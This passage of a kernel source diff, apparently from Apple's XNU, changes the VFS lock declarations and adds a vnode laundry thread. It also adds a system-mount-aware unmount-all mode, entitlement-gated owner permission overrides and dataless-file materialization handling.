*vnode_lck_attr; +static LCK_GRP_DECLARE(vnode_lck_grp, "vnode"); +static LCK_ATTR_DECLARE(vnode_lck_attr, 0, 0); #if CONFIG_TRIGGERS -extern lck_grp_t *trigger_vnode_lck_grp; -extern lck_attr_t *trigger_vnode_lck_attr; +static LCK_GRP_DECLARE(trigger_vnode_lck_grp, "trigger_vnode"); +static LCK_ATTR_DECLARE(trigger_vnode_lck_attr, 0, 0); #endif -extern lck_mtx_t * mnt_list_mtx_lock; +extern lck_mtx_t mnt_list_mtx_lock; ZONE_DECLARE(specinfo_zone, "specinfo", sizeof(struct specinfo), ZC_NOENCRYPT | ZC_ZFREE_CLEARMEM); @@ -172,7 +172,6 @@ int vttoif_tab[9] = { S_IFSOCK, S_IFIFO, S_IFMT, }; - /* XXX These should be in a BSD accessible Mach header, but aren't. */ extern void memory_object_mark_used( memory_object_control_t control); @@ -259,6 +258,13 @@ TAILQ_HEAD(ragelst, vnode) vnode_rage_list; /* vnode rapid age list */ struct timeval rage_tv; int rage_limit = 0; int ragevnodes = 0; + +int deadvnodes_low = 0; +int deadvnodes_high = 0; + +uint64_t newvnode = 0; +uint64_t newvnode_nodead = 0; + static int vfs_unmountall_started = 0; #define RAGE_LIMIT_MIN 100 @@ -348,6 +354,7 @@ static int print_busy_vnodes = 0; /* print out bus } while(0) static void async_work_continue(void); +static void vn_laundry_continue(void); /* * Initialize the vnode management data structures. @@ -370,11 +377,19 @@ vntblinit(void) rage_limit = RAGE_LIMIT_MIN; } + deadvnodes_low = (desiredvnodes) / 100; + if (deadvnodes_low > 300) { + deadvnodes_low = 300; + } + deadvnodes_high = deadvnodes_low * 2; + /* * create worker threads */ kernel_thread_start((thread_continue_t)async_work_continue, NULL, &thread); thread_deallocate(thread); + kernel_thread_start((thread_continue_t)vn_laundry_continue, NULL, &thread); + thread_deallocate(thread); } /* the timeout is in 10 msecs */ @@ -461,7 +476,7 @@ vnode_hasdirtyblks(vnode_t vp) struct cl_writebehind *wbp; /* - * Not taking the buf_mtxp as there is little + * Not taking the buf_mtx as there is little * point doing it. Even if the lock is taken the * state can change right after that. If their * needs to be a synchronization, it must be driven @@ -488,7 +503,7 @@ int vnode_hascleanblks(vnode_t vp) { /* - * Not taking the buf_mtxp as there is little + * Not taking the buf_mtx as there is little * point doing it. Even if the lock is taken the * state can change right after that. If their * needs to be a synchronization, it must be driven @@ -903,7 +918,7 @@ mount_iterdrain(mount_t mp) { mount_list_lock(); while (mp->mnt_iterref) { - msleep((caddr_t)&mp->mnt_iterref, mnt_list_mtx_lock, PVFS, "mount_iterdrain", NULL); + msleep((caddr_t)&mp->mnt_iterref, &mnt_list_mtx_lock, PVFS, "mount_iterdrain", NULL); } /* mount iterations drained */ mp->mnt_iterref = -1; @@ -1308,7 +1323,7 @@ cache_purge_callback(mount_t mp, __unused void * arg) return VFS_RETURNED; } -extern lck_rw_t * rootvnode_rw_lock; +extern lck_rw_t rootvnode_rw_lock; extern void set_rootvnode(vnode_t); @@ -1655,7 +1670,7 @@ vfs_switch_root(const char *incoming_vol_old_path, pmi->pm_mount = pmi->pm_rootvnode->v_mount; } - lck_rw_lock_exclusive(rootvnode_rw_lock); + lck_rw_lock_exclusive(&rootvnode_rw_lock); /* Setup incoming as the new rootfs */ lck_rw_lock_exclusive(&incoming->mnt_rwlock); @@ -1701,6 +1716,11 @@ vfs_switch_root(const char *incoming_vol_old_path, vnode_unlock(outgoing_vol_new_covered_vp); lck_rw_done(&outgoing->mnt_rwlock); + if (!(outgoing->mnt_kern_flag & MNTK_VIRTUALDEV) && + (TAILQ_FIRST(&mountlist) == outgoing)) { + vfs_setmntsystem(outgoing); + } + /* * Finally, remove the mount_t linkage from the previously covered * vnodes on the old root volume. These were incoming_vol_old_path, @@ -1734,7 +1754,7 @@ vfs_switch_root(const char *incoming_vol_old_path, * prevents concurrent vnode_lookups. */ set_rootvnode(incoming_rootvnode); - lck_rw_unlock_exclusive(rootvnode_rw_lock); + lck_rw_unlock_exclusive(&rootvnode_rw_lock); if (!(incoming->mnt_kern_flag & MNTK_VIRTUALDEV) && !(outgoing->mnt_kern_flag & MNTK_VIRTUALDEV)) { @@ -2888,7 +2908,14 @@ vclean(vnode_t vp, int flags) } #if CONFIG_MACF - mac_vnode_notify_reclaim(vp); + if (vp->v_mount) { + /* + * It is possible for bdevvp vnodes to not have a mount + * pointer. It's fine to let it get reclaimed without + * notifying. + */ + mac_vnode_notify_reclaim(vp); + } #endif if (active && (flags & DOCLOSE)) { @@ -2968,6 +2995,12 @@ vclean(vnode_t vp, int flags) } #endif +#if CONFIG_IO_COMPRESSION_STATS + if ((vp->io_compression_stats)) { + vnode_iocs_record_and_free(vp); + } +#endif /* CONFIG_IO_COMPRESSION_STATS */ + /* * Reclaim the vnode. */ @@ -3472,7 +3505,7 @@ extension_cmp(const void *a, const void *b) // them (i.e. a short 8 character name can't have an 8 // character extension). // -extern lck_mtx_t *pkg_extensions_lck; +extern lck_mtx_t pkg_extensions_lck; __private_extern__ int set_package_extensions_table(user_addr_t data, int nentries, int maxwidth) @@ -3503,7 +3536,7 @@ set_package_extensions_table(user_addr_t data, int nentries, int maxwidth) qsort(new_exts, nentries, maxwidth, extension_cmp); - lck_mtx_lock(pkg_extensions_lck); + lck_mtx_lock(&pkg_extensions_lck); old_exts = extension_table; old_nentries = nexts; @@ -3512,7 +3545,7 @@ set_package_extensions_table(user_addr_t data, int nentries, int maxwidth) nexts = nentries; max_ext_width = maxwidth; - lck_mtx_unlock(pkg_extensions_lck); + lck_mtx_unlock(&pkg_extensions_lck); kheap_free(KHEAP_DATA_BUFFERS, old_exts, (old_nentries * old_maxwidth) + 1); @@ -3550,7 +3583,7 @@ is_package_name(const char *name, int len) // advance over the "." name_ext++; - lck_mtx_lock(pkg_extensions_lck); + lck_mtx_lock(&pkg_extensions_lck); // now iterate over all the extensions to see if any match ptr = &extension_table[0]; @@ -3558,12 +3591,12 @@ is_package_name(const char *name, int len) extlen = strlen(ptr); if (strncasecmp(name_ext, ptr, extlen) == 0 && name_ext[extlen] == '\0') { // aha, a match! - lck_mtx_unlock(pkg_extensions_lck); + lck_mtx_unlock(&pkg_extensions_lck); return 1; } } - lck_mtx_unlock(pkg_extensions_lck); + lck_mtx_unlock(&pkg_extensions_lck); // if we get here, no extension matched return 0; @@ -3814,6 +3847,8 @@ out: struct unmount_info { int u_errs; // Total failed unmounts int u_busy; // EBUSY failed unmounts + int u_count; // Total volumes iterated + int u_only_non_system; }; static int @@ -3823,18 +3858,27 @@ unmount_callback(mount_t mp, void *arg) char *mntname; struct unmount_info *uip = arg; - mount_ref(mp, 0); - mount_iterdrop(mp); // avoid vfs_iterate deadlock in dounmount() + uip->u_count++; mntname = zalloc(ZV_NAMEI); strlcpy(mntname, mp->mnt_vfsstat.f_mntonname, MAXPATHLEN); - error = dounmount(mp, MNT_FORCE, 1, vfs_context_current()); - if (error) { - uip->u_errs++; - printf("Unmount of %s failed (%d)\n", mntname ? mntname:"?", error); - if (error == EBUSY) { - uip->u_busy++; + if (uip->u_only_non_system + && ((mp->mnt_flag & MNT_ROOTFS) || (mp->mnt_kern_flag & MNTK_SYSTEM))) { //MNTK_BACKS_ROOT + printf("unmount(%d) %s skipped\n", uip->u_only_non_system, mntname); + mount_iterdrop(mp); // VFS_ITERATE_CB_DROPREF + } else { + printf("unmount(%d) %s\n", uip->u_only_non_system, mntname); + + mount_ref(mp, 0); + mount_iterdrop(mp); // VFS_ITERATE_CB_DROPREF + error = dounmount(mp, MNT_FORCE, 1, vfs_context_current()); + if (error) { + uip->u_errs++; + printf("Unmount of %s failed (%d)\n", mntname ? mntname:"?", error); + if (error == EBUSY) { + uip->u_busy++; + } } } if (mntname) { @@ -3850,21 +3894,23 @@ unmount_callback(mount_t mp, void *arg) * Busy mounts are retried. */ __private_extern__ void -vfs_unmountall(void) +vfs_unmountall(int only_non_system) { int mounts, sec = 1; struct unmount_info ui; vfs_unmountall_started = 1; + printf("vfs_unmountall(%ssystem) start\n", only_non_system ? "non" : ""); retry: - ui.u_errs = ui.u_busy = 0; + ui.u_errs = ui.u_busy = ui.u_count = 0; + ui.u_only_non_system = only_non_system; + // avoid vfs_iterate deadlock in dounmount(), use VFS_ITERATE_CB_DROPREF vfs_iterate(VFS_ITERATE_CB_DROPREF | VFS_ITERATE_TAIL_FIRST, unmount_callback, &ui); mounts = mount_getvfscnt(); if (mounts == 0) { return; } - if (ui.u_busy > 0) { // Busy mounts - wait & retry tsleep(&nummounts, PVFS, "busy mount", sec * hz); sec *= 2; @@ -3872,10 +3918,12 @@ retry: goto retry; } printf("Unmounting timed out\n"); - } else if (ui.u_errs < mounts) { + } else if (ui.u_count < mounts) { // If the vfs_iterate missed mounts in progress - wait a bit tsleep(&nummounts, PVFS, "missed mount", 2 * hz); } + + printf("vfs_unmountall(%ssystem) end\n", only_non_system ? "non" : ""); } /* @@ -4201,15 +4249,13 @@ vfs_init_io_attributes(vnode_t devvp, mount_t mp) } static struct klist fs_klist; -lck_grp_t *fs_klist_lck_grp; -lck_mtx_t *fs_klist_lock; +static LCK_GRP_DECLARE(fs_klist_lck_grp, "fs_klist"); +static LCK_MTX_DECLARE(fs_klist_lock, &fs_klist_lck_grp); void vfs_event_init(void) { klist_init(&fs_klist); - fs_klist_lck_grp = lck_grp_alloc_init("fs_klist", NULL); - fs_klist_lock = lck_mtx_alloc_init(fs_klist_lck_grp, NULL); } void @@ -4228,9 +4274,9 @@ vfs_event_signal(fsid_t *fsid, u_int32_t event, intptr_t data) } } - lck_mtx_lock(fs_klist_lock); + lck_mtx_lock(&fs_klist_lock); KNOTE(&fs_klist, event); - lck_mtx_unlock(fs_klist_lock); + lck_mtx_unlock(&fs_klist_lock); } /* @@ -4615,9 +4661,9 @@ filt_fsattach(struct knote *kn, __unused struct kevent_qos_s *kev) kn->kn_flags |= EV_CLEAR; /* automatic */ kn->kn_sdata = 0; /* incoming data is ignored */ - lck_mtx_lock(fs_klist_lock); + lck_mtx_lock(&fs_klist_lock); KNOTE_ATTACH(&fs_klist, kn); - lck_mtx_unlock(fs_klist_lock); + lck_mtx_unlock(&fs_klist_lock); /* * filter only sees future events, @@ -4629,9 +4675,9 @@ filt_fsattach(struct knote *kn, __unused struct kevent_qos_s *kev) static void filt_fsdetach(struct knote *kn) { - lck_mtx_lock(fs_klist_lock); + lck_mtx_lock(&fs_klist_lock); KNOTE_DETACH(&fs_klist, kn); - lck_mtx_unlock(fs_klist_lock); + lck_mtx_unlock(&fs_klist_lock); } static int @@ -4654,7 +4700,7 @@ filt_fstouch(struct knote *kn, struct kevent_qos_s *kev) { int res; - lck_mtx_lock(fs_klist_lock); + lck_mtx_lock(&fs_klist_lock); kn->kn_sfflags = kev->fflags; @@ -4670,7 +4716,7 @@ filt_fstouch(struct knote *kn, struct kevent_qos_s *kev) // kn->kn_fflags &= kn->kn_sfflags; res = (kn->kn_fflags != 0); - lck_mtx_unlock(fs_klist_lock); + lck_mtx_unlock(&fs_klist_lock); return res; } @@ -4680,12 +4726,12 @@ filt_fsprocess(struct knote *kn, struct kevent_qos_s *kev) { int res = 0; - lck_mtx_lock(fs_klist_lock); + lck_mtx_lock(&fs_klist_lock); if (kn->kn_fflags) { knote_fill_kevent(kn, kev, 0); res = 1; } - lck_mtx_unlock(fs_klist_lock); + lck_mtx_unlock(&fs_klist_lock); return res; } @@ -4781,7 +4827,8 @@ sysctl_vfs_generic_conf SYSCTL_HANDLER_ARGS } /* the vfs.generic. branch. */ -SYSCTL_NODE(_vfs, VFS_GENERIC, generic, CTLFLAG_RW | CTLFLAG_LOCKED, NULL, "vfs generic hinge"); +SYSCTL_EXTENSIBLE_NODE(_vfs, VFS_GENERIC, generic, + CTLFLAG_RW | CTLFLAG_LOCKED, NULL, "vfs generic hinge"); /* retreive a list of mounted filesystem fsid_t */ SYSCTL_PROC(_vfs_generic, OID_AUTO, vfsidlist, CTLTYPE_STRUCT | CTLFLAG_RD | CTLFLAG_LOCKED, @@ -4857,7 +4904,7 @@ long num_reusedvnodes = 0; static vnode_t -process_vp(vnode_t vp, int want_vp, int *deferred) +process_vp(vnode_t vp, int want_vp, bool can_defer, int *deferred) { unsigned int vpid; @@ -4916,7 +4963,7 @@ process_vp(vnode_t vp, int want_vp, int *deferred) * Checks for anyone racing us for recycle */ if (vp->v_type != VBAD) { - if (want_vp && (vnode_on_reliable_media(vp) == FALSE || (vp->v_flag & VISDIRTY))) { + if ((want_vp || can_defer) && (vnode_on_reliable_media(vp) == FALSE || (vp->v_flag & VISDIRTY))) { vnode_async_list_add(vp); vnode_unlock(vp); @@ -4979,7 +5026,7 @@ async_work_continue(void) vp = TAILQ_FIRST(q); - vp = process_vp(vp, 0, &deferred); + vp = process_vp(vp, 0, false, &deferred); if (vp != NULLVP) { panic("found VBAD vp (%p) on async queue", vp); @@ -4987,6 +5034,68 @@ async_work_continue(void) } } +__attribute__((noreturn)) +static void +vn_laundry_continue(void) +{ + struct freelst *free_q; + struct ragelst *rage_q; + int deferred; + vnode_t vp; + bool rage_q_empty; + bool free_q_empty; + + + free_q = &vnode_free_list; + rage_q = &vnode_rage_list; + + for (;;) { + vnode_list_lock(); + + free_q_empty = TAILQ_EMPTY(free_q); + rage_q_empty = TAILQ_EMPTY(rage_q); + + if (!rage_q_empty && !free_q_empty) { + struct timeval current_tv; + + microuptime(¤t_tv); + if (ragevnodes < rage_limit && + ((current_tv.tv_sec - rage_tv.tv_sec) < RAGE_TIME_LIMIT)) { + rage_q_empty = true; + } + } + + if (deadvnodes >= deadvnodes_high || + (rage_q_empty && free_q_empty) || + numvnodes < desiredvnodes) { + assert_wait(free_q, (THREAD_UNINT)); + + vnode_list_unlock(); + + thread_block((thread_continue_t)vn_laundry_continue); + + continue; + } + + if (!rage_q_empty) { + vp = TAILQ_FIRST(rage_q); + } else { + vp = TAILQ_FIRST(free_q); + } + + vp = process_vp(vp, 0, true, &deferred); + } +} + +static inline void +wakeup_laundry_thread() +{ + if ((deadvnodes < deadvnodes_low) && + /* Minimum number of free vnodes the thread should act on */ + ((freevnodes + ragevnodes) > 10)) { + wakeup(&vnode_free_list); + } +} static int new_vnode(vnode_t *vpp) @@ -5006,6 +5115,7 @@ retry: vp = NULLVP; vnode_list_lock(); + newvnode++; if (need_reliable_vp == TRUE) { async_work_timed_out++; @@ -5019,6 +5129,9 @@ retry: * Can always reuse a dead one */ vp = TAILQ_FIRST(&vnode_dead_list); + if (numvnodes >= desiredvnodes) { + wakeup_laundry_thread(); + } goto steal_this_vp; } /* @@ -5026,11 +5139,14 @@ retry: * the limit, we'll create a new vnode */ numvnodes++; + if (numvnodes >= desiredvnodes) { + wakeup_laundry_thread(); + } vnode_list_unlock(); vp = zalloc_flags(vnode_zone, Z_WAITOK | Z_ZERO); VLISTNONE(vp); /* avoid double queue removal */ - lck_mtx_init(&vp->v_lock, vnode_lck_grp, vnode_lck_attr); + lck_mtx_init(&vp->v_lock, &vnode_lck_grp, &vnode_lck_attr); TAILQ_INIT(&vp->v_ncchildren); @@ -5048,6 +5164,9 @@ retry: vp->v_iocount = 1; goto done; } + + wakeup_laundry_thread(); + microuptime(¤t_tv); #define MAX_WALK_COUNT 1000 @@ -5060,16 +5179,6 @@ retry: panic("new_vnode: vp (%p) on RAGE list not marked VLIST_RAGE", vp); } - /* - * skip free vnodes created by bdevvp as they are - * typically not fully constructedi and may have issues - * in getting reclaimed. - */ - if (vp->v_flag & VBDEVVP) { - bdevvp_vnodes++; - continue; - } - // if we're a dependency-capable process, skip vnodes that can // cause recycling deadlocks. (i.e. this process is diskimages // helper and the vnode is in a disk image). Querying the @@ -5108,16 +5217,6 @@ retry: */ walk_count = 0; TAILQ_FOREACH(vp, &vnode_free_list, v_freelist) { - /* - * skip free vnodes created by bdevvp as they are - * typically not fully constructedi and may have issues - * in getting reclaimed. - */ - if (vp->v_flag & VBDEVVP) { - bdevvp_vnodes++; - continue; - } - // if we're a dependency-capable process, skip vnodes that can // cause recycling deadlocks. (i.e. this process is diskimages // helper and the vnode is in a disk image). Querying the @@ -5217,8 +5316,9 @@ retry: *vpp = NULL; return ENFILE; } + newvnode_nodead++; steal_this_vp: - if ((vp = process_vp(vp, 1, &deferred)) == NULLVP) { + if ((vp = process_vp(vp, 1, true, &deferred)) == NULLVP) { if (deferred) { int elapsed_msecs; struct timeval elapsed_tv; @@ -8006,6 +8106,14 @@ vnode_authorize_posix(vauth_ctx vcp, int action, int on_dir) } owner_ok = (needed & vap->va_mode) == needed; + /* + * Processes with the appropriate entitlement can marked themselves as + * ignoring file/directory permissions if they own it. + */ + if (!owner_ok && proc_ignores_node_permissions(vfs_context_proc(vcp->ctx))) { + owner_ok = 1; + } + /* group permissions */ needed = 0; if (action & VREAD) { @@ -8037,6 +8145,7 @@ vnode_authorize_posix(vauth_ctx vcp, int action, int on_dir) _SETWHERE("all"); goto out; } + if (!owner_ok && !group_ok && !world_ok) { _SETWHERE("all"); error = EACCES; @@ -8199,6 +8308,10 @@ vnode_authorize_delete(vauth_ctx vcp, boolean_t cached_delete_child) switch (eval.ae_result) { case KAUTH_RESULT_DENY: + if (vauth_file_owner(vcp) && proc_ignores_node_permissions(vfs_context_proc(vcp->ctx))) { + KAUTH_DEBUG("%p Override DENY due to entitlement", vcp->vp); + return 0; + } KAUTH_DEBUG("%p DENIED - denied by ACL", vcp->vp); return EACCES; case KAUTH_RESULT_ALLOW: @@ -8267,6 +8380,10 @@ vnode_authorize_delete(vauth_ctx vcp, boolean_t cached_delete_child) } switch (eval.ae_result) { case KAUTH_RESULT_DENY: + if (vauth_dir_owner(vcp) && proc_ignores_node_permissions(vfs_context_proc(vcp->ctx))) { + KAUTH_DEBUG("%p Override DENY due to entitlement", vcp->vp); + return 0; + } KAUTH_DEBUG("%p DENIED - denied by directory ACL", vcp->vp); return EACCES; case KAUTH_RESULT_ALLOW: @@ -8390,6 +8507,10 @@ vnode_authorize_simple(vauth_ctx vcp, kauth_ace_rights_t acl_rights, kauth_ace_r switch (eval.ae_result) { case KAUTH_RESULT_DENY: + if (vauth_file_owner(vcp) && proc_ignores_node_permissions(vfs_context_proc(vcp->ctx))) { + KAUTH_DEBUG("%p Override DENY due to entitlement", vcp->vp); + return 0; + } KAUTH_DEBUG("%p DENIED - by ACL", vcp->vp); return EACCES; /* deny, deny, counter-allege */ case KAUTH_RESULT_ALLOW: @@ -8516,7 +8637,8 @@ vnode_authorize_simple(vauth_ctx vcp, kauth_ace_rights_t acl_rights, kauth_ace_r * Check for file immutability. */ static int -vnode_authorize_checkimmutable(mount_t mp, struct vnode_attr *vap, int rights, int ignore) +vnode_authorize_checkimmutable(mount_t mp, vauth_ctx vcp, + struct vnode_attr *vap, int rights, int ignore) { int error; int append; @@ -8569,6 +8691,22 @@ vnode_authorize_checkimmutable(mount_t mp, struct vnode_attr *vap, int rights, i } } if ((error = vnode_immutable(vap, append, ignore)) != 0) { + if (error && !ignore) { + /* + * In case of a rename, we want to check ownership for dvp as well. + */ + int owner = 0; + if (rights & KAUTH_VNODE_DELETE_CHILD && vcp->dvp != NULL) { + owner = vauth_file_owner(vcp) && vauth_dir_owner(vcp); + } else { + owner = vauth_file_owner(vcp); + } + if (owner && proc_ignores_node_permissions(vfs_context_proc(vcp->ctx))) { + error = vnode_immutable(vap, append, 1); + } + } + } + if (error) { KAUTH_DEBUG("%p DENIED - file is immutable", vap); goto out; } @@ -8779,14 +8917,14 @@ vnode_attr_authorize_internal(vauth_ctx vcp, mount_t mp, * In the deletion case, parent directory immutability vetoes specific * file rights. */ - if ((result = vnode_authorize_checkimmutable(mp, vcp->vap, rights, + if ((result = vnode_authorize_checkimmutable(mp, vcp, vcp->vap, rights, noimmutable)) != 0) { goto out; } if ((rights & KAUTH_VNODE_DELETE) && !parent_authorized_for_delete_child) { - result = vnode_authorize_checkimmutable(mp, vcp->dvap, + result = vnode_authorize_checkimmutable(mp, vcp, vcp->dvap, KAUTH_VNODE_DELETE_CHILD, 0); if (result) { goto out; @@ -10687,7 +10825,7 @@ vnode_resolver_create(mount_t mp, vnode_t vp, struct vnode_trigger_param *tinfo, return ENOMEM; } - lck_mtx_init(&rp->vr_lock, trigger_vnode_lck_grp, trigger_vnode_lck_attr); + lck_mtx_init(&rp->vr_lock, &trigger_vnode_lck_grp, &trigger_vnode_lck_attr); rp->vr_resolve_func = tinfo->vnt_resolve_func; rp->vr_unresolve_func = tinfo->vnt_unresolve_func; @@ -10726,7 +10864,7 @@ vnode_resolver_release(vnode_resolve_t rp) rp->vr_reclaim_func(NULLVP, rp->vr_data); } - lck_mtx_destroy(&rp->vr_lock, trigger_vnode_lck_grp); + lck_mtx_destroy(&rp->vr_lock, &trigger_vnode_lck_grp); kheap_free(KHEAP_DEFAULT, rp, sizeof(struct vnode_resolve)); } diff --git a/bsd/vfs/vfs_syscalls.c b/bsd/vfs/vfs_syscalls.c index cb7cf97fd..a1c721e9e 100644 --- a/bsd/vfs/vfs_syscalls.c +++ b/bsd/vfs/vfs_syscalls.c @@ -253,11 +253,14 @@ int sync_internal(void); __private_extern__ int unlink1(vfs_context_t, vnode_t, user_addr_t, enum uio_seg, int); -extern lck_grp_t *fd_vn_lck_grp; -extern lck_grp_attr_t *fd_vn_lck_grp_attr; -extern lck_attr_t *fd_vn_lck_attr; +static LCK_GRP_DECLARE(fd_vn_lck_grp, "fd_vnode_data"); +static LCK_ATTR_DECLARE(fd_vn_lck_attr, 0, 0); -extern lck_rw_t * rootvnode_rw_lock; +/* vars for sync mutex */ +static LCK_GRP_DECLARE(sync_mtx_lck_grp, "sync thread"); +static LCK_MTX_DECLARE(sync_mtx_lck, &sync_mtx_lck_grp); + +extern lck_rw_t rootvnode_rw_lock; /* * incremented each time a mount or unmount operation occurs @@ -859,6 +862,11 @@ mount_common(char *fstypename, vnode_t pvp, vnode_t vp, } #endif /* CONFIG_NFS_CLIENT || DEVFS */ + if (KERNEL_MOUNT_DEVFS & internal_flags) { + // kernel mounted devfs + mp->mnt_kern_flag |= MNTK_SYSTEM; + } + update: /* @@ -2198,10 +2206,10 @@ checkdirs(vnode_t olddp, vfs_context_t ctx) if (rootvnode == olddp) { vnode_ref(newdp); - lck_rw_lock_exclusive(rootvnode_rw_lock); + lck_rw_lock_exclusive(&rootvnode_rw_lock); tvp = rootvnode; rootvnode = newdp; - lck_rw_unlock_exclusive(rootvnode_rw_lock); + lck_rw_unlock_exclusive(&rootvnode_rw_lock); vnode_rele(tvp); } @@ -2317,6 +2325,10 @@ safedounmount(struct mount *mp, int flags, vfs_context_t ctx) * associated with it (for example, the associated VM or DATA mounts) . */ if ((mp->mnt_flag & MNT_ROOTFS) || (mp->mnt_kern_flag & MNTK_SYSTEM)) { + if (!(mp->mnt_flag & MNT_ROOTFS)) { + printf("attempt to unmount a system mount (%s), will return EBUSY\n", + mp->mnt_vfsstat.f_mntonname); + } error = EBUSY; /* the root (or associated volumes) is always busy */ goto out; } @@ -2833,17 +2845,17 @@ sync_thread(__unused void *arg, __unused wait_result_t wr) pm_sync_thread = current_thread(); #endif /* CONFIG_PHYS_WRITE_ACCT */ - lck_mtx_lock(sync_mtx_lck); + lck_mtx_lock(&sync_mtx_lck); while (sync_thread_state & SYNC_THREAD_RUN) { sync_thread_state &= ~SYNC_THREAD_RUN; - lck_mtx_unlock(sync_mtx_lck); + lck_mtx_unlock(&sync_mtx_lck); sync_type = SYNC_ONLY_RELIABLE_MEDIA; vfs_iterate(LK_NOWAIT, sync_internal_callback, &sync_type); sync_type = SYNC_ONLY_UNRELIABLE_MEDIA; vfs_iterate(LK_NOWAIT, sync_internal_callback, &sync_type); - lck_mtx_lock(sync_mtx_lck); + lck_mtx_lock(&sync_mtx_lck); } /* * This wakeup _has_ to be issued before the lock is released otherwise @@ -2856,7 +2868,7 @@ sync_thread(__unused void *arg, __unused wait_result_t wr) #if CONFIG_PHYS_WRITE_ACCT pm_sync_thread = NULL; #endif /* CONFIG_PHYS_WRITE_ACCT */ - lck_mtx_unlock(sync_mtx_lck); + lck_mtx_unlock(&sync_mtx_lck); if (print_vmpage_stat) { vm_countdirtypages(); @@ -2883,7 +2895,7 @@ sync_internal(void) int thread_created = FALSE; struct timespec ts = {.tv_sec = sync_timeout_seconds, .tv_nsec = 0}; - lck_mtx_lock(sync_mtx_lck); + lck_mtx_lock(&sync_mtx_lck); sync_thread_state |= SYNC_THREAD_RUN; if (!(sync_thread_state & SYNC_THREAD_RUNNING)) { int kr; @@ -2892,14 +2904,14 @@ sync_internal(void) kr = kernel_thread_start(sync_thread, NULL, &thd); if (kr != KERN_SUCCESS) { sync_thread_state &= ~SYNC_THREAD_RUNNING; - lck_mtx_unlock(sync_mtx_lck); + lck_mtx_unlock(&sync_mtx_lck); printf("sync_thread failed\n"); return 0; } thread_created = TRUE; } - error = msleep((caddr_t)&sync_thread_state, sync_mtx_lck, + error = msleep((caddr_t)&sync_thread_state, &sync_mtx_lck, (PVFS | PDROP | PCATCH), "sync_thread", &ts); if (error) { struct timeval now; @@ -4119,7 +4131,7 @@ fg_vn_data_alloc(void) /* Allocate per fd vnode data */ fvdata = kheap_alloc(KM_FD_VN_DATA, sizeof(struct fd_vn_data), Z_WAITOK | Z_ZERO); - lck_mtx_init(&fvdata->fv_lock, fd_vn_lck_grp, fd_vn_lck_attr); + lck_mtx_init(&fvdata->fv_lock, &fd_vn_lck_grp, &fd_vn_lck_attr); return fvdata; } @@ -4132,7 +4144,7 @@ fg_vn_data_free(void *fgvndata) struct fd_vn_data *fvdata = (struct fd_vn_data *)fgvndata; kheap_free(KHEAP_DATA_BUFFERS, fvdata->fv_buf, fvdata->fv_bufallocsiz); - lck_mtx_destroy(&fvdata->fv_lock, fd_vn_lck_grp); + lck_mtx_destroy(&fvdata->fv_lock, &fd_vn_lck_grp); kheap_free(KM_FD_VN_DATA, fvdata, sizeof(struct fd_vn_data)); } @@ -7990,14 +8002,14 @@ clonefile_internal(vnode_t fvp, boolean_t data_read_authorised, int dst_dirfd, /* * certain attributes may need to be changed from the source, we ask for - * those here. + * those here with the exception of source file's ACL. The clone file + * will inherit the target directory's ACL. */ VATTR_INIT(&va); VATTR_WANTED(&va, va_uid); VATTR_WANTED(&va, va_gid); VATTR_WANTED(&va, va_mode); VATTR_WANTED(&va, va_flags); - VATTR_WANTED(&va, va_acl); if ((error = vnode_getattr(fvp, &va, ctx)) != 0) { goto out; @@ -8061,7 +8073,7 @@ clonefile_internal(vnode_t fvp, boolean_t data_read_authorised, int dst_dirfd, * If some of the requested attributes weren't handled by the * VNOP, use our fallback code. */ - if (!VATTR_ALL_SUPPORTED(&va)) { + if (!VATTR_ALL_SUPPORTED(&nva)) { (void)vnode_setattr_fallback(tvp, &nva, ctx); } @@ -10577,8 +10589,9 @@ static LIST_HEAD(nspace_resolver_requesthead, static u_long nspace_resolver_request_hashmask; static u_int nspace_resolver_request_count; static bool nspace_resolver_request_wait_slot; -static lck_grp_t *nspace_resolver_request_lck_grp; -static lck_mtx_t nspace_resolver_request_hash_mutex; +static LCK_GRP_DECLARE(nspace_resolver_request_lck_grp, "file namespace resolver"); +static LCK_MTX_DECLARE(nspace_resolver_request_hash_mutex, + &nspace_resolver_request_lck_grp); #define NSPACE_REQ_LOCK() \ lck_mtx_lock(&nspace_resolver_request_hash_mutex) @@ -10886,60 +10899,6 @@ nspace_materialization_set_thread_state(int is_prevented) return 0; } -static int -nspace_materialization_is_prevented(void) -{ - proc_t p = current_proc(); - uthread_t ut = (uthread_t)get_bsdthread_info(current_thread()); - vfs_context_t ctx = vfs_context_current(); - - /* - * Kernel context ==> return EDEADLK, as we would with any random - * process decorated as no-materialize. - */ - if (ctx == vfs_context_kernel()) { - return EDEADLK; - } - - /* - * If the process has the dataless-manipulation entitlement, - * materialization is prevented, and depending on the kind - * of file system operation, things get to proceed as if the - * object is not dataless. - */ - if (vfs_context_is_dataless_manipulator(ctx)) { - return EJUSTRETURN; - } - - /* - * Per-thread decorations override any process-wide decorations. - * (Foundation uses this, and this overrides even the dataless- - * manipulation entitlement so as to make API contracts consistent.) - */ - if (ut != NULL) { - if (ut->uu_flag & UT_NSPACE_NODATALESSFAULTS) { - return EDEADLK; - } - if (ut->uu_flag & UT_NSPACE_FORCEDATALESSFAULTS) { - return 0; - } - } - - /* - * If the process's iopolicy specifies that dataless files - * can be materialized, then we let it go ahead. - */ - if (p->p_vfs_iopolicy & P_VFS_IOPOLICY_MATERIALIZE_DATALESS_FILES) { - return 0; - } - - /* - * The default behavior is to not materialize dataless files; - * return to the caller that deadlock was detected. - */ - return EDEADLK; -} - /* the vfs.nspace branch */ SYSCTL_NODE(_vfs, OID_AUTO, nspace, CTLFLAG_RW | CTLFLAG_LOCKED, NULL, "vfs nspace hinge"); @@ -11078,16 +11037,67 @@ SYSCTL_PROC(_vfs_nspace, OID_AUTO, complete, #define __no_dataless_unused __unused #endif -void -nspace_resolver_init(void) +int +vfs_context_dataless_materialization_is_prevented( + vfs_context_t const ctx __no_dataless_unused) { #if CONFIG_DATALESS_FILES - nspace_resolver_request_lck_grp = - lck_grp_alloc_init("file namespace resolver", NULL); + proc_t const p = vfs_context_proc(ctx); + thread_t const t = vfs_context_thread(ctx); + uthread_t const ut = t ? get_bsdthread_info(t) : NULL; + + /* + * Kernel context ==> return EDEADLK, as we would with any random + * process decorated as no-materialize. + */ + if (ctx == vfs_context_kernel()) { + return EDEADLK; + } + + /* + * If the process has the dataless-manipulation entitlement, + * materialization is prevented, and depending on the kind + * of file system operation, things get to proceed as if the + * object is not dataless. + */ + if (vfs_context_is_dataless_manipulator(ctx)) { + return EJUSTRETURN; + } + + /* + * Per-thread decorations override any process-wide decorations. + * (Foundation uses this, and this overrides even the dataless- + * 